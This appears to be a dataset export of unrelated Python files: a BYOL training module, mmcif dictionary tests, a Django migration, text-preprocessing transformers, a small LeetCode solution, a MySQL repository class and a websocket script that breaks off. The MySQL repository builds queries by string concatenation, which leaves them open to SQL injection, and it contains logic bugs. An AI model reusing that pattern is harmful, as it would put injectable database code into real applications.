content
stringlengths 5
1.05M
|
|---|
import pytorch_lightning as pl
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision.utils as vutils
from torchvision import models, transforms
from torch.optim import Adam
from torchsummary import summary
import numpy as np
from byol_pytorch import BYOL
class ContrastiveLearner(pl.LightningModule):
def __init__(self, net, config):
super().__init__()
self.config = config
self.BYOL = BYOL(net=net,
image_size=self.config['exp_params']['image_size'],
hidden_layer=self.config['model_params']['hidden_layer'],
projection_size=self.config['model_params']['projection_size'],
projection_hidden_size=self.config['model_params']['projection_hidden_size'],
moving_average_decay=self.config['model_params']['moving_average_decay'],
use_momentum=True)
def forward(self, x):
return self.BYOL(x)
def configure_optimizers(self):
return Adam(self.parameters(), lr=self.config['exp_params']['LR'], betas=(self.config['exp_params']['beta1'], self.config['exp_params']['beta2']))
def on_before_zero_grad(self, _):
if self.BYOL.use_momentum:
self.BYOL.update_moving_average()
def training_step(self, batch, batch_idx):
loss = self.forward(batch)
self.log('loss', loss, on_step=True, prog_bar=False)
return {"loss": loss}
'''
def validation_step(self, batch, batch_idx):
loss = self.forward(batch)
# save input and output images at beginning of epoch
if batch_idx == 0:
self.save_images(x, output, "val_input_output")
return {"val_loss": loss}
def validation_epoch_end(self, outputs):
avg_loss = torch.stack([x["val_loss"] for x in outputs]).mean()
self.log('avg_val_loss', avg_loss, on_epoch=True, prog_bar=True)
def save_images(self, x, output, name, n=16):
"""
Saves a plot of n images from input and output batch
"""
# make grids and save to logger
grid_top = vutils.make_grid(x[:n,:,:,:], nrow=n)
grid_bottom = vutils.make_grid(output[:n,:,:,:], nrow=n)
grid = torch.cat((grid_top, grid_bottom), 1)
self.logger.experiment.add_image(name, grid, self.current_epoch)
'''
|
##
# File: DictionaryApiTests.py
# Author: jdw
# Date: 8-Mar-2018
# Version: 0.001
##
"""
Tests cases for Dictionary API.
"""
from __future__ import absolute_import, print_function
import json
import logging
import os
import pprint
import sys
import time
import unittest
from mmcif.api.DictionaryApi import DictionaryApi
from mmcif.api.PdbxContainers import CifName
from mmcif.io.IoAdapterPy import IoAdapterPy as IoAdapter
HERE = os.path.abspath(os.path.dirname(__file__))
TOPDIR = os.path.dirname(os.path.dirname(HERE))
try:
from mmcif import __version__
except ImportError:
sys.path.insert(0, TOPDIR)
from mmcif import __version__
__docformat__ = "google en"
__author__ = "John Westbrook"
__email__ = "jwest@rcsb.rutgers.edu"
__license__ = "Apache 2.0"
logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s]-%(module)s.%(funcName)s: %(message)s")
logger = logging.getLogger()
logger.setLevel(logging.INFO)
class DictionaryApiTests(unittest.TestCase):
def setUp(self):
self.__lfh = sys.stderr
self.__verbose = False
self.__pathPdbxDictionary = os.path.join(HERE, "data", "mmcif_pdbx_v5_next.dic")
self.__pathPdbxDictionaryExtension = os.path.join(HERE, "data", "pdbx-dictionary-extensions-examples.dic")
self.__containerList = None
self.__startTime = time.time()
logger.debug("Running tests on version %s", __version__)
logger.debug("Starting %s at %s", self.id(), time.strftime("%Y %m %d %H:%M:%S", time.localtime()))
def tearDown(self):
endTime = time.time()
logger.debug("Completed %s at %s (%.4f seconds)", self.id(), time.strftime("%Y %m %d %H:%M:%S", time.localtime()), endTime - self.__startTime)
#
def testExtensions(self):
"""Test case - condition extensions"""
try:
myIo = IoAdapter(raiseExceptions=True)
self.__containerList = myIo.readFile(inputFilePath=self.__pathPdbxDictionary)
self.__containerList.extend(myIo.readFile(inputFilePath=self.__pathPdbxDictionaryExtension))
dApi = DictionaryApi(containerList=self.__containerList, consolidate=True)
tD = dApi.getItemValueConditionDict()
logger.debug("tD \n%s", pprint.pformat(tD))
self.assertGreaterEqual(len(tD), 2)
tD = dApi.getComparisonOperatorDict()
logger.debug("tD \n%s", pprint.pformat(tD))
self.assertGreaterEqual(len(tD), 5)
tL = dApi.getComparisonOperators()
logger.debug("tL %r", tL)
self.assertGreaterEqual(len(tL), 5)
#
tD = dApi.getItemLinkedConditions()
logger.debug("tD \n%s", pprint.pformat(tD))
self.assertGreaterEqual(len(tD), 1)
except Exception as e:
logger.exception("Failing with %s", str(e))
self.fail()
def testExtendedEnums(self):
"""Test case - to verify extended enums -"""
try:
myIo = IoAdapter(raiseExceptions=True)
self.__containerList = myIo.readFile(inputFilePath=self.__pathPdbxDictionary)
dApi = DictionaryApi(containerList=self.__containerList, consolidate=True, verbose=self.__verbose)
#
eList = dApi.getEnumListWithFullDetails(category="chem_comp", attribute="mon_nstd_flag")
logger.info("Item Enum list sorted %r\n", eList)
self.assertGreaterEqual(len(eList), 4)
eList = dApi.getEnumListWithFullDetails(category="atom_site", attribute="refinement_flags_occupancy")
logger.info("Item Enum list sorted %r\n", eList)
self.assertGreaterEqual(len(eList), 1)
#
except Exception as e:
logger.exception("Failing with %s", str(e))
self.fail()
def testDumpEnums(self):
"""Test case - to verify enum ordering -"""
try:
myIo = IoAdapter(raiseExceptions=True)
self.__containerList = myIo.readFile(inputFilePath=self.__pathPdbxDictionary)
dApi = DictionaryApi(containerList=self.__containerList, consolidate=True, verbose=self.__verbose)
#
eList = dApi.getEnumListAlt(category="pdbx_audit_support", attribute="country")
logger.debug("Item %s Enum list sorted %r\n", "country", eList)
eList = dApi.getEnumListAlt(category="pdbx_audit_support", attribute="country", sortFlag=False)
logger.debug("Item %s Enum list unsorted %r\n", "country", eList)
eList = dApi.getEnumListAltWithDetail(category="pdbx_audit_support", attribute="country")
logger.debug("Item %s Enum with detail list %r\n", "country", eList)
self.assertGreater(len(eList), 100)
except Exception as e:
logger.exception("Failing with %s", str(e))
self.fail()
def testDumpIndex(self):
"""Test case - dump methods for dictionary metadata"""
try:
myIo = IoAdapter(raiseExceptions=True)
self.__containerList = myIo.readFile(inputFilePath=self.__pathPdbxDictionary)
dApi = DictionaryApi(containerList=self.__containerList, consolidate=True, verbose=self.__verbose)
if self.__verbose:
dApi.dumpCategoryIndex(fh=self.__lfh)
logger.debug("Index = %r\n", dApi.getItemNameList("pdbx_nmr_spectral_dim"))
logger.debug("Index = %r\n", dApi.getAttributeNameList("pdbx_nmr_spectral_dim"))
catIndex = dApi.getCategoryIndex()
logger.debug("Index = %r\n", catIndex["pdbx_nmr_spectral_dim"])
self.assertIsNotNone(catIndex["pdbx_nmr_spectral_dim"])
except Exception as e:
logger.exception("Failing with %s", str(e))
self.fail()
def testDumpDictionary(self):
"""Test case - dump methods for dictionary metadata"""
try:
myIo = IoAdapter(raiseExceptions=True)
self.__containerList = myIo.readFile(inputFilePath=self.__pathPdbxDictionary)
dApi = DictionaryApi(containerList=self.__containerList, consolidate=True, verbose=self.__verbose)
# dApi.dumpCategoryIndex(fh=self.__lfh)
# dApi.dumpEnumFeatures(fh=self.__lfh)
# dApi.dumpFeatures(fh=self.__lfh)
# dApi.dumpMethods(fh=self.__lfh)
logger.debug("+++++++++++++++++++++++++++++++++++++++++++++++++++++++\n")
groupList = dApi.getCategoryGroups()
logger.debug("groupList %s\n", groupList)
for group in groupList:
logger.debug("Group %s category list %s\n", group, dApi.getCategoryGroupCategories(groupName=group))
self.assertGreater(len(groupList), 10)
except Exception as e:
logger.exception("Failing with %s", str(e))
self.fail()
def testConsolidateDictionary(self):
"""Test case - dump methods for dictionary metadata"""
try:
myIo = IoAdapter(raiseExceptions=True)
self.__containerList = myIo.readFile(inputFilePath=self.__pathPdbxDictionary)
dApi = DictionaryApi(containerList=self.__containerList, consolidate=True, expandItemLinked=False, verbose=self.__verbose)
for itemName in [
"_entity.id",
"_entity_poly_seq.num",
"_atom_site.label_asym_id",
"_struct_asym.id",
"_chem_comp.id",
"chem_comp_atom.comp_id",
"chem_comp_bond.comp_id",
]:
categoryName = CifName.categoryPart(itemName)
attributeName = CifName.attributePart(itemName)
logger.debug("Full parent list for %s : %s\n", itemName, dApi.getFullParentList(categoryName, attributeName))
logger.debug("Full child list for %s : %s\n", itemName, dApi.getFullChildList(categoryName, attributeName))
logger.debug("Ultimate parent for %s : %s\n", itemName, dApi.getUltimateParent(categoryName, attributeName))
logger.debug("Type code for %s : %s\n", itemName, dApi.getTypeCode(categoryName, attributeName))
self.assertIsNotNone(dApi.getTypeCode(categoryName, attributeName))
except Exception as e:
logger.exception("Failing with %s", str(e))
self.fail()
def testGetAdjacentCategories(self):
"""Test case -"""
try:
myIo = IoAdapter(raiseExceptions=True)
self.__containerList = myIo.readFile(inputFilePath=self.__pathPdbxDictionary)
dApi = DictionaryApi(containerList=self.__containerList, consolidate=True, verbose=self.__verbose)
cList = dApi.getCategoryList()
cI = {}
for cV in cList:
chL = dApi.getChildCategories(cV)
pL = dApi.getParentCategories(cV)
for ch in chL:
if (ch, cV) not in cI:
cI[(ch, cV)] = 1
else:
cI[(ch, cV)] += 1
for pV in pL:
if (cV, pV) not in cI:
cI[(cV, pV)] = 1
else:
cI[(cV, pV)] += 1
linkL = []
for tup in cI:
dD = {"source": tup[0], "target": tup[1], "type": "link"}
linkL.append(dD)
if self.__verbose:
print(json.dumps(linkL, sort_keys=True, indent=4, separators=(",", ": ")))
self.assertGreater(len(linkL), 50)
except Exception as e:
logger.exception("Failing with %s", str(e))
self.fail()
def suiteIndexTests():
suiteSelect = unittest.TestSuite()
suiteSelect.addTest(DictionaryApiTests("testDumpIndex"))
return suiteSelect
def suiteDictionaryApiTests():
suiteSelect = unittest.TestSuite()
suiteSelect.addTest(DictionaryApiTests("testDumpDictionary"))
return suiteSelect
def suiteConsolidateTests():
suiteSelect = unittest.TestSuite()
suiteSelect.addTest(DictionaryApiTests("testConsolidateDictionary"))
return suiteSelect
def suiteAdjacentTests():
suiteSelect = unittest.TestSuite()
suiteSelect.addTest(DictionaryApiTests("testGetAdjacentCategories"))
return suiteSelect
def suiteDictionaryApiEnumTests():
suiteSelect = unittest.TestSuite()
suiteSelect.addTest(DictionaryApiTests("testDumpEnums"))
return suiteSelect
if __name__ == "__main__":
mySuite = suiteDictionaryApiTests()
unittest.TextTestRunner(verbosity=2).run(mySuite)
mySuite = suiteConsolidateTests()
unittest.TextTestRunner(verbosity=2).run(mySuite)
mySuite = suiteAdjacentTests()
unittest.TextTestRunner(verbosity=2).run(mySuite)
mySuite = suiteDictionaryApiEnumTests()
unittest.TextTestRunner(verbosity=2).run(mySuite)
mySuite = suiteIndexTests()
unittest.TextTestRunner(verbosity=2).run(mySuite)
|
# Generated by Django 2.2.9 on 2020-02-19 21:39
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("course_flow", "0001_initial"),
]
operations = [
migrations.AlterModelOptions(
name="activity",
options={
"verbose_name": "Activity",
"verbose_name_plural": "Activities",
},
),
migrations.AlterModelOptions(
name="componentprogram",
options={
"verbose_name": "Component-Program Link",
"verbose_name_plural": "Component-Program Links",
},
),
migrations.AlterModelOptions(
name="componentweek",
options={
"verbose_name": "Component-Week Link",
"verbose_name_plural": "Component-Week Links",
},
),
migrations.AlterModelOptions(
name="nodestrategy",
options={
"verbose_name": "Node-Strategy Link",
"verbose_name_plural": "Node-Strategy Links",
},
),
migrations.AlterModelOptions(
name="outcome",
options={
"verbose_name": "Outcome",
"verbose_name_plural": "Outcomes",
},
),
migrations.AlterModelOptions(
name="outcomeactivity",
options={
"verbose_name": "Outcome-Activity Link",
"verbose_name_plural": "Outcome-Activity Links",
},
),
migrations.AlterModelOptions(
name="outcomeartifact",
options={
"verbose_name": "Outcome-Artifact Link",
"verbose_name_plural": "Outcome-Artifact Links",
},
),
migrations.AlterModelOptions(
name="outcomeassessment",
options={
"verbose_name": "Outcome-Assessment Link",
"verbose_name_plural": "Outcome-Assessment Links",
},
),
migrations.AlterModelOptions(
name="outcomecourse",
options={
"verbose_name": "Outcome-Course Link",
"verbose_name_plural": "Outcome-Course Links",
},
),
migrations.AlterModelOptions(
name="outcomenode",
options={
"verbose_name": "Outcome-Node Link",
"verbose_name_plural": "Outcome-Node Links",
},
),
migrations.AlterModelOptions(
name="outcomepreparation",
options={
"verbose_name": "Outcome-Preparation Link",
"verbose_name_plural": "Outcome-Preparation Links",
},
),
migrations.AlterModelOptions(
name="outcomeprogram",
options={
"verbose_name": "Outcome-Program Link",
"verbose_name_plural": "Outcome-Program Links",
},
),
migrations.AlterModelOptions(
name="outcomestrategy",
options={
"verbose_name": "Outcome-Strategy Link",
"verbose_name_plural": "Outcome-Strategy Links",
},
),
migrations.AlterModelOptions(
name="outcomeweek",
options={
"verbose_name": "Outcome-Week Link",
"verbose_name_plural": "Outcome-Week Links",
},
),
migrations.AlterModelOptions(
name="strategy",
options={
"verbose_name": "Strategy",
"verbose_name_plural": "Strategies",
},
),
migrations.AlterModelOptions(
name="strategyactivity",
options={
"verbose_name": "Strategy-Activity Link",
"verbose_name_plural": "Strategy-Activity Links",
},
),
migrations.AlterModelOptions(
name="weekcourse",
options={
"verbose_name": "Week-Course Link",
"verbose_name_plural": "Week-Course Links",
},
),
migrations.AddField(
model_name="activity",
name="static",
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name="course",
name="static",
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name="node",
name="author",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="author",
to=settings.AUTH_USER_MODEL,
),
),
migrations.CreateModel(
name="NodeCompletionStatus",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("is_completed", models.BooleanField(default=False)),
(
"node",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="course_flow.Node",
),
),
(
"student",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
],
options={
"verbose_name": "Node Completion Status",
"verbose_name_plural": "Node Completion Statuses",
},
),
migrations.CreateModel(
name="ComponentCompletionStatus",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("is_completed", models.BooleanField(default=False)),
(
"component",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="course_flow.Component",
),
),
(
"student",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
],
options={
"verbose_name": "Component Completion Status",
"verbose_name_plural": "Component Completion Statuses",
},
),
migrations.AddField(
model_name="node",
name="students",
field=models.ManyToManyField(
blank=True,
related_name="students",
through="course_flow.NodeCompletionStatus",
to=settings.AUTH_USER_MODEL,
),
),
]
|
#!/usr/bin/env python
# Copyright 2021 Marcelo Sanches
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Attributions
#
# The expand_contractions function and WordCounterToVectorTransformer
# class are verbatim copies from Dipanjan Sarkar and Aurelien Geron's
# work.
#
# The other three classes were the focus of my efforts, yet were heavily
# adapted from A. Geron's original class in his famous classification
# notebook from his book: Hands-On Machine Learning with Scikit-Learn,
# Keras, and TensorFlow published by O'Reilly.
#
# See code for specific attributions and links.
import re
import os
import time
import json
import numpy as np
import pandas as pd
import urlextract
from html import unescape
from nltk.util import ngrams
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from nltk.stem import WordNetLemmatizer
from scipy.sparse import csr_matrix
from collections import Counter
from sklearn.base import BaseEstimator, TransformerMixin
# The expand_contractions function was written by Dipanjan Sarkar,
# Data Science Lead at Applied Materials, kdnuggets.com contributor,
# author of Practical Machine Learning with Python (Apache 2.0 License)
# https://github.com/dipanjanS/practical-machine-learning-with-python
# https://www.kdnuggets.com/2018/08/practitioners-guide-processing-understanding-text-2.html
# load contractions map
with open("contractions_map.json") as f:
contractions_map = json.load(f)
def expand_contractions(text, contractions_map):
pattern = re.compile('({})'.format('|'.join(contractions_map.keys())),
flags=re.IGNORECASE|re.DOTALL)
def expand_match(contraction):
match = contraction.group(0)
first_char = match[0]
expanded_contraction = contractions_map.get(match)\
if contractions_map.get(match)\
else contractions_map.get(match.lower())
expanded_contraction = first_char+expanded_contraction[1:]
return expanded_contraction
expanded_text = pattern.sub(expand_match, text)
expanded_text = re.sub("'", "", expanded_text)
return expanded_text
def is_ascii(doc):
try:
doc.encode(encoding='utf-8').decode('ascii')
except UnicodeDecodeError:
return False
else:
return True
# instantiate url extractor and lemmatizer
url_extractor = urlextract.URLExtract()
lemmatizer = WordNetLemmatizer()
# The three Word-to-Counter transformer classes were heavily adapted from
# A. Geron's classificaion notebook:
# In [152]: class EmailToWordCounterTransformer
# https://github.com/ageron/handson-ml/blob/master/03_classification.ipynb
class DocumentToWordCounterTransformer(BaseEstimator, TransformerMixin):
def __init__(self, expand_contractions=True, lower_case=True,
replace_usernames=True, unescape_html=True,
replace_urls=True, replace_numbers=True,
remove_junk=True, remove_punctuation=True,
replace_emojis=True, replace_nonascii=True,
remove_stopwords=True, lemmatization=True):
self.expand_contractions = expand_contractions
self.lower_case = lower_case
self.replace_usernames = replace_usernames
self.unescape_html = unescape_html
self.replace_urls = replace_urls
self.replace_numbers = replace_numbers
self.remove_junk = remove_junk
self.remove_punctuation = remove_punctuation
self.replace_emojis = replace_emojis
self.replace_nonascii = replace_nonascii
self.remove_stopwords = remove_stopwords
self.lemmatization = lemmatization
def fit(self, X, y=None):
return self
def transform(self, X, y=None):
X_transformed = []
for doc in X:
if self.lower_case:
doc = doc.lower()
if self.expand_contractions and contractions_map is not None:
doc = expand_contractions(doc, contractions_map)
if self.replace_usernames:
doc = re.sub(r'^@([^\s]+)',' USR ', doc)
if self.unescape_html:
doc = unescape(doc)
if self.replace_urls and url_extractor is not None:
urls = list(set(url_extractor.find_urls(doc)))
urls.sort(key=lambda url: len(url), reverse=True)
for url in urls:
doc = doc.replace(url, ' URL ')
if self.replace_numbers:
doc = re.sub(r'\d+(?:\.\d*(?:[eE]\d+))?', ' NUM ', doc)
if self.remove_punctuation:
doc = re.sub(r'\W+', ' ', doc, flags=re.M)
if self.remove_junk:
pattern = r'\¥|\â|\«|\»|\Ñ|\Ð|\¼|\½|\¾|\¿|\x82\
|\x83|\x84|\x85|\x86|\x87|\x88|\x89|\
|\x8a|\x8b|\x8c|\x8d|\x8e|\°|\µ|\´|\º|\¹|\³'
doc = re.sub(pattern,'', doc)
if self.replace_emojis:
doc = re.sub(r'[^\x00-\x7F]+', ' EMOJI ', doc)
if self.replace_nonascii:
if is_ascii(doc) == False:
doc = ' NONASCII '
word_counts = Counter(doc.split())
if self.remove_stopwords:
# 25 semantically non-selective words from the Reuters-RCV1 dataset
stop_words = ['a','an','and','are','as','at','be','by','for','from',
'has','he','in','is','it','its','of','on','that','the',
'to','was','were','will','with']
for word in stop_words:
try:
word_counts.pop(word)
except KeyError:
continue
if self.lemmatization and lemmatizer is not None:
lemmatized_word_counts = Counter()
for word, count in word_counts.items():
lemmatized_word = lemmatizer.lemmatize(word)
lemmatized_word_counts[lemmatized_word] += count
word_counts = lemmatized_word_counts
X_transformed.append(word_counts)
return np.array(X_transformed)
class DocumentToBigramCounterTransformer(BaseEstimator, TransformerMixin):
def __init__(self, expand_contractions=True, lower_case=True,
replace_usernames=True, unescape_html=True,
replace_urls=True, replace_numbers=True,
remove_junk=True, remove_punctuation=True,
replace_emojis=True, replace_nonascii=True,
remove_stopwords=True, lemmatization=True,
bigrams=True):
self.expand_contractions = expand_contractions
self.lower_case = lower_case
self.replace_usernames = replace_usernames
self.unescape_html = unescape_html
self.replace_urls = replace_urls
self.replace_numbers = replace_numbers
self.remove_junk = remove_junk
self.remove_punctuation = remove_punctuation
self.replace_emojis = replace_emojis
self.replace_nonascii = replace_nonascii
self.remove_stopwords = remove_stopwords
self.lemmatization = lemmatization
self.bigrams = bigrams
def fit(self, X, y=None):
return self
def transform(self, X, y=None):
X_transformed = []
for doc in X:
if self.lower_case:
doc = doc.lower()
if self.expand_contractions and contractions_map is not None:
doc = expand_contractions(doc, contractions_map)
if self.replace_usernames:
doc = re.sub(r'^@([^\s]+)',' USR ', doc)
if self.unescape_html:
doc = unescape(doc)
if self.replace_urls and url_extractor is not None:
urls = list(set(url_extractor.find_urls(doc)))
urls.sort(key=lambda url: len(url), reverse=True)
for url in urls:
doc = doc.replace(url, ' URL ')
if self.replace_numbers:
doc = re.sub(r'\d+(?:\.\d*(?:[eE]\d+))?', ' NUM ', doc)
if self.remove_punctuation:
doc = re.sub(r'\W+', ' ', doc, flags=re.M)
if self.remove_junk:
pattern = r'\¥|\â|\«|\»|\Ñ|\Ð|\¼|\½|\¾|\¿|\x82\
|\x83|\x84|\x85|\x86|\x87|\x88|\x89|\
|\x8a|\x8b|\x8c|\x8d|\x8e|\°|\µ|\´|\º|\¹|\³'
doc = re.sub(pattern,'', doc)
if self.replace_emojis:
doc = re.sub(r'[^\x00-\x7F]+', ' EMOJI ', doc)
if self.replace_nonascii:
if is_ascii(doc) == False:
doc = ' NONASCII '
# tokenize
tokens = doc.split()
if self.remove_stopwords:
stop_words = ['a','an','and','are','as','at','be','by','for','from',
'has','he','in','is','it','its','of','on','that','the',
'to','was','were','will','with']
tokens = [t for t in tokens if t not in stop_words]
if self.lemmatization and lemmatizer is not None:
tokens = [lemmatizer.lemmatize(t) for t in tokens]
if self.bigrams:
bigrams = ngrams(word_tokenize(doc), 2)
bigrams = ['_'.join(grams) for grams in bigrams]
tokens = [*tokens, *bigrams]
# include counts
tokens_counts = Counter(tokens)
# append to list
X_transformed.append(tokens_counts)
return np.array(X_transformed)
class DocumentToNgramCounterTransformer(BaseEstimator, TransformerMixin):
def __init__(self, expand_contractions=True, lower_case=True,
replace_usernames=True, unescape_html=True,
replace_urls=True, replace_numbers=True,
remove_junk=True, remove_punctuation=True,
replace_emojis=True, replace_nonascii=True,
remove_stopwords=True, lemmatization=True,
n_grams=2 # defaults to bigram
):
self.expand_contractions = expand_contractions
self.lower_case = lower_case
self.replace_usernames = replace_usernames
self.unescape_html = unescape_html
self.replace_urls = replace_urls
self.replace_numbers = replace_numbers
self.remove_junk = remove_junk
self.remove_punctuation = remove_punctuation
self.replace_emojis = replace_emojis
self.replace_nonascii = replace_nonascii
self.remove_stopwords = remove_stopwords
self.lemmatization = lemmatization
self.n_grams = n_grams
def fit(self, X, y=None):
return self
def transform(self, X, y=None):
X_transformed = []
for doc in X:
if self.lower_case:
doc = doc.lower()
if self.expand_contractions and contractions_map is not None:
doc = expand_contractions(doc, contractions_map)
if self.replace_usernames:
doc = re.sub(r'^@([^\s]+)',' USR ', doc)
if self.unescape_html:
doc = unescape(doc)
if self.replace_urls and url_extractor is not None:
urls = list(set(url_extractor.find_urls(doc)))
urls.sort(key=lambda url: len(url), reverse=True)
for url in urls:
doc = doc.replace(url, ' URL ')
if self.replace_numbers:
doc = re.sub(r'\d+(?:\.\d*(?:[eE]\d+))?', ' NUM ', doc)
if self.remove_punctuation:
doc = re.sub(r'\W+', ' ', doc, flags=re.M)
if self.remove_junk:
pattern = r'\¥|\â|\«|\»|\Ñ|\Ð|\¼|\½|\¾|\¿|\x82\
|\x83|\x84|\x85|\x86|\x87|\x88|\x89|\
|\x8a|\x8b|\x8c|\x8d|\x8e|\°|\µ|\´|\º|\¹|\³'
doc = re.sub(pattern,'', doc)
if self.replace_emojis:
doc = re.sub(r'[^\x00-\x7F]+', ' EMOJI ', doc)
if self.replace_nonascii:
if is_ascii(doc) == False:
doc = ' NONASCII '
# tokenize
tokens = doc.split()
if self.remove_stopwords:
stop_words = ['a','an','and','are','as','at','be','by','for','from',
'has','he','in','is','it','its','of','on','that','the',
'to','was','were','will','with']
tokens = [t for t in tokens if t not in stop_words]
if self.lemmatization and lemmatizer is not None:
tokens = [lemmatizer.lemmatize(t) for t in tokens]
if self.n_grams:
for i in range(2, self.n_grams+1): # fix doubling of unigrams
grams = ngrams(word_tokenize(doc), i)
grams = ['_'.join(gram) for gram in grams]
tokens = [*tokens, *grams]
# include counts
tokens_counts = Counter(tokens)
# append to list
X_transformed.append(tokens_counts)
return np.array(X_transformed)
# The WordCounterToVectorTransformer transformer class is a verbatim copy from
# A. Geron's classificaion notebook:
# In [154]:
# https://github.com/ageron/handson-ml/blob/master/03_classification.ipynb
class WordCounterToVectorTransformer(BaseEstimator, TransformerMixin):
def __init__(self, vocabulary_size=1000):
self.vocabulary_size = vocabulary_size
def fit(self, X, y=None):
total_count = Counter()
for word_count in X:
for word, count in word_count.items():
total_count[word] += min(count, 10)
most_common = total_count.most_common()[:self.vocabulary_size]
self.most_common_ = most_common
self.vocabulary_ = {word: index + 1 for index, (word, count) in enumerate(most_common)}
return self
def transform(self, X, y=None):
rows = []
cols = []
data = []
for row, word_count in enumerate(X):
for word, count in word_count.items():
rows.append(row)
cols.append(self.vocabulary_.get(word, 0))
data.append(count)
return csr_matrix((data, (rows, cols)), shape=(len(X), self.vocabulary_size + 1))
|
class Solution:
"""
Time Complexity: O(N)
Space Complexity: O(1)
"""
def balanced_string_split(self, s: str) -> int:
# initialize variables
L_count, R_count = 0, 0
balanced_substring_count = 0
# parse the string
for char in s:
# update the number of Ls and the number of Rs so far
if char == 'L':
L_count += 1
elif char == 'R':
R_count += 1
# if the string is balanced, increment the balanced substrings count and reset the counters
if L_count == R_count:
balanced_substring_count += 1
L_count, R_count = 0, 0
return balanced_substring_count
|
import mysql.connector
from Repositories.BaseRepository import Repository
from mysql.connector import errorcode
class SqlRepo(Repository):
'''
A generic class for a repository for a given class
'''
def __init__(self, config, objFromSql, objToSql, db, db_params):
'''
The constructor of the Repository class
:param fileName: the location of the file we want to read from
:param name: the name of the repository
'''
super().__init__()
self.__config = config
self.__objFromSql = objFromSql
self.__objToSql = objToSql
self.__db = db
self.__db_params = db_params
def getItemById(self, itemId):
command = "SELECT * FROM " + self.__db + " where id = " + str(itemId)
try:
cnx = mysql.connector.connect(**self.__config)
cursor = cnx.cursor()
cursor.execute(command)
data = cursor.fetchall()
cnx.commit()
if len(data) > 0:
return self.__objFromSql(*data[0])
return False
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
raise ValueError("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
raise ValueError("Database does not exist")
else:
pass
else:
cnx.close()
def executeSqlCommand(self, command):
try:
cnx = mysql.connector.connect(**self.__config)
cursor = cnx.cursor()
cursor.execute(command)
data = cursor.fetchall()
cnx.commit()
return self.__objFromSql(*data[0])
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
raise ValueError("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
raise ValueError("Database does not exist")
else:
pass
else:
cnx.close()
def getAllLines(self):
'''
A function that returns all the lines from file
:return: a list of lists of form (*params) where params are the attributes of the given class
'''
command = "SELECT * from " + self.__db
try:
cnx = mysql.connector.connect(**self.__config)
cursor = cnx.cursor()
cursor.execute(command)
data = cursor.fetchall()
cnx.commit()
return list(map(lambda x: self.__objFromSql(*x), data))
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
raise ValueError("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
raise ValueError("Database does not exist")
else:
raise ValueError(err)
else:
cnx.close()
def createItem(self, item):
'''
Create a new item in the repository and adds it to the file as a new line
:param item: object - the item we want to add in the repository
:return: returns True if there wasn't any errors and we successfully added the new item
'''
if self.getItemById(item) is not None:
raise ValueError("The given id is l")
command = "INSERT INTO " + self.__db + self.__db_params + " Values("
item = self.__objToSql(item)
sqlItem = ""
for i in item:
if item.index(i) != len(item) - 1:
if isinstance(i, int):
sqlItem += '%s, ' % i
else:
sqlItem += "'%s', " % (i)
else:
sqlItem += "'%s'" % (i)
command = command + sqlItem + ");"
try:
cnx = mysql.connector.connect(**self.__config)
cursor = cnx.cursor()
cursor.execute(command)
cnx.commit()
return True
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
raise ValueError("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
raise ValueError("Database does not exist")
else:
print(err)
pass
else:
cnx.close()
return True
def updateItemById(self, itemId, item):
'''
A function that updates an item from the repository by a given id
:param itemId: the id of the item we want to modify
:param item: the item with the new given properties
:return: returns True if there wasn't any errors and the item was updated with success
'''
if self.getItemById(itemId) is False:
return False
self.deleteItemById(itemId)
self.createItem(item)
return True
def deleteItemById(self, itemId):
'''
A functions that deletes an item by a given id
:param itemId: the item's id we want to delete
:return: True, if there wasn't any errors and the item was successfully deleted
'''
command = "Delete from " + self.__db + " where id= " + str(itemId)
try:
cnx = mysql.connector.connect(**self.__config)
cursor = cnx.cursor()
cursor.execute(command)
cnx.commit()
return True
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
raise ValueError("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
raise ValueError("Database does not exist")
else:
raise ValueError(str(err))
else:
cnx.close()
def __str__(self):
return Repository.__str__(self)
|
"""DjAI Pre-Trained Torch Vision Model classes."""
|
#!/usr/bin/python
import argparse
import json
import logging
import signal
import sys
import time
import websocket
logger = logging.getLogger(__name__)
def signal_handler(sig, frame):
logger.debug('Received signal to stop, exiting')
sys.stdout.write('\n')
sys.stdout.flush()
sys.exit(0)
# Global player state
state = {
'playState': False,
}
channels = {
'playState': (lambda x: state.update({'playState': x['payload']})),
'track': (lambda x: state.update(x['payload'])),
